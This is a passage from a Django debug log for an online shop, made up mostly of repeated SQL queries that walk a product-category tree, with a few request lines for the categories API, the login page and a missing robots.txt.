"shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 06:59:36,759 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 06:59:36,762 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 06:59:36,765 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 06:59:36,767 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 06:59:36,769 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 06:59:36,771 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 06:59:36,773 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 06:59:36,777 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 06:59:36,779 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 06:59:36,781 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 06:59:36,784 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 06:59:36,786 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 06:59:36,789 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 06:59:36,792 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 06:59:36,794 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 06:59:36,796 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 06:59:36,798 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 06:59:36,802 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 06:59:36,804 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 06:59:36,806 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 06:59:36,808 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 06:59:36,811 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 06:59:36,813 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 06:59:36,816 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 06:59:36,818 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 06:59:36,820 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 06:59:36,823 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 06:59:36,825 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 06:59:36] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [16/Dec/2019 07:01:32] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 07:01:33,598 utils 20136 140506432534272 (0.007) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '3zxlqyouoti8tx6tlquiqh7nt54upcr1' LIMIT 1; args=('3zxlqyouoti8tx6tlquiqh7nt54upcr1',) DEBUG 2019-12-16 07:01:33,602 utils 20136 140506432534272 (0.004) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('3zxlqyouoti8tx6tlquiqh7nt54upcr1', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-30T07:01:33.598465+00:00'::timestamptz); args=('3zxlqyouoti8tx6tlquiqh7nt54upcr1', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 30, 7, 1, 33, 598465, tzinfo=)) [16/Dec/2019 07:01:33] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /robots.txt [16/Dec/2019 07:02:21] "GET /robots.txt HTTP/1.0" 404 6624 [16/Dec/2019 07:02:23] "GET / HTTP/1.0" 302 0 [16/Dec/2019 07:05:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 07:05:31,538 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:05:31,545 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:05:31,549 utils 20136 140506422044416 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 7; args=(7,) DEBUG 2019-12-16 07:05:31,549 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:05:31,558 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:05:31,563 utils 20136 140506432534272 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:05:31,568 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:05:31,572 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) [16/Dec/2019 07:05:31] "GET /api/v1/categories/7 HTTP/1.0" 200 998 DEBUG 2019-12-16 07:05:31,577 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:05:31,581 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:05:31,586 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:05:31,592 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:05:31,596 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:05:31,600 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:05:31,604 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:05:31,608 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:05:31,614 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:05:31,618 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:05:31,622 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:05:31,626 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:05:31,630 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:05:31,636 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:05:31,640 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:05:31,644 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:05:31,648 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:05:31,652 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:05:31,657 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:05:31,663 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:05:31,667 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:05:31,671 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:05:31,675 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:05:31,680 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:05:31,686 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:05:31,690 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:05:31,696 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:05:31,700 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", 